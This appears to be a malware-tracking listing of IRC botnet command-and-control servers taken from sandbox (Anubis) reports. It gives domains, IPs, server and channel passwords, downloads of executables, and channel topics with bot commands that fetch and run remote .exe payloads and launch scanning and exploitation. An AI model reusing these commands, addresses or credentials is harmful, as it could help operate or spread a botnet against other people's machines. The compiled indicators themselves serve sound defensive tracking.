– DNS Queries: Name Query Type Query Result Successful Protocol proxim.ntkrnlpa.info DNS_TYPE_A 83.68.16.6 1 – IRC Conversations: From ANUBIS:1035 to 83.68.16.6:80 Nick: vncvfrotUsername: j020501Private Message to User &virtu3: “”
sec.republicofskorea.info
– DNS Queries: Name Query Type Query Result Successful Protocol sec.republicofskorea.info DNS_TYPE_A 66.79.160.82 1 + Opened Listening Ports: – IRC Conversations: From ANUBIS:1163 to 66.79.160.82:8082 Nick: [00|USA|XP|403344]Username: SP3-817Server Pass: 3v1l$Joined Channel: ##sploit with Password sPLoiT!Channel Topic for Channel ##sploit: “!asc -S -s|!patch|!ip.wg3t -s -S|!ip.wg3t http://205.209.161.194:8095/x C:1.exe 1|!http http://205.209.142.139:9095/s|!asc s 60 3 0 -b -e -s|!ascRead more...
84.244.11.202:31091
– DNS Queries: Name Query Type Query Result Successful Protocol serv01.colo.owned.hu DNS_TYPE_A 0 – IRC Conversations: From ANUBIS:1032 to 84.244.11.202:31091 Nick: user|816Username: user|816Joined Channel: #helpdesk# with Password syslock
serv01.colo.owned.hu/foro.melodiasmoviles.com
– DNS Queries:serv01.colo.owned.hu DNS_TYPE_A 87.234.140.73 1 foro.melodiasmoviles.com DNS_TYPE_A 1 – HTTP Conversations: From ANUBIS:1033 to 74.52.56.242:80 – [foro.melodiasmoviles.com] Request: GET /…/lol.exe Response: 200 “OK” – IRC Conversations: 87.234.140.73:31091 Nick: user|61Username: user|61Joined Channel: #support# with Password syslockChannel Topic for Channel #support#: “! dlx foro.melodiasmoviles.com/…/sshbx5.exe;! scanexec tty1.exe $ip 0”
teek.ihshsd8.com (Baadshah from #bottalk next server)
– DNS Queries:teek.ihshsd8.com– HTTP Conversations: From ANUBIS:1039 to 72.10.169.26:80 – [72.10.169.26] Request: GET /newpack.exe Response: 200 “OK” – IRC Conversations: From ANUBIS:1034 to 72.10.172.218:9928 Nick: QkmESFPjUsername: keiqylJoined Channel: #siwaChannel Topic for Channel #siwa: “=sns+a5P/xtPiMMQV3WArMqVpEo5yf63afj9I5m9v8Yb8jQyjvrOao6a1D2ggD/yKpW9RhWz0X53yvkkpx6XNxUvY9j4LTZ4T50pVxGMhIxZj7mZxfpCQ2yznwKlKtnHwcB”
rs.wtfbbqz.info
– IRC Conversations:221.11.6.203:7007Nick: [P00|USA|31740]Username: XP-4976Joined Channel: ##security
xx.ka3ek.com/channellili5.com/zonetech.info
– DNS Queries:Name Query Type Query Result Successful Protocol xx.ka3ek.com DNS_TYPE_A 67.43.226.242 1 … DNS_TYPE_A 0 channellili5.com DNS_TYPE_A 0 zonetech.info DNS_TYPE_A 72.10.166.195 1 – HTTP Conversations:72.10.166.195:80 – [zonetech.info] Request: GET /ns6.exe Response: 200 “OK” – IRC Conversations:67.43.226.242:8080 Nick: VndhdZPkUsername: nhymppJoined Channel: #las6Channel Topic for Channel #las6: “=AMZ7AvE/iLXeUnAvUfZPqMvDThxwZSF004FsQnPnjGBPYx8MEknE73CtRA2GdWniEL9hzXmawnM1YrBnc28RA/9z7kQh/g203Sh+tcfAj7W8ar0Ag0HcmdwB7KTzFAe3dlqfGsZ/YaUNJjJvhXKQ+8tnPxENLQqy3mmwMYFsGbuCnShS3fqKrOolhS8UGlttitdMDTAUIXTTgWxC”Private Message to Channel #las6: “-^C042^C- Running TFTP wormrideRead more...
proxim.ntkrnlpa.info
– DNS Queries:proxim.ntkrnlpa.info– IRC Conversations:83.68.16.30:80 Nick: znmipplyUsername: z020501Private Message to User &virtu3: “” – DNS Queries:millanchannel.info – HTTP Conversations:67.18.161.250:80 – [millanchannel.info] Request: GET /uddb.exe Response: 200 “OK” Request: GET /uddb.exe Response: 200 “OK”
irc.johnny.gr
– DNS Queries:irc.johnny.gr– IRC Conversations:89.163.182.24:1836Nick: USA|97757Username: pesxwJoined Channel: ##pia
nadsam0.info and ss.ka3ek.com
– DNS Queries:Name Query Type Query Result Successful Protocolss.ka3ek.com DNS_TYPE_A 67.43.232.36 1 nadsam0.info DNS_TYPE_A 72.10.167.74 1 – HTTP Conversations:72.10.167.74:80 – [nadsam0.info] Request: GET /x.exe Response: 200 “OK” Request: GET /is.exe Response: 200 “OK” Request: GET /laslas.exe Response: 200 “OK” – IRC Conversations:67.43.232.36:10324Nick: VyJodwfXUsername: woowfkJoined Channel: #rsJoined Channel: #proxxJoined Channel: #kok6Joined Channel: #63Channel Topic for ChannelRead more...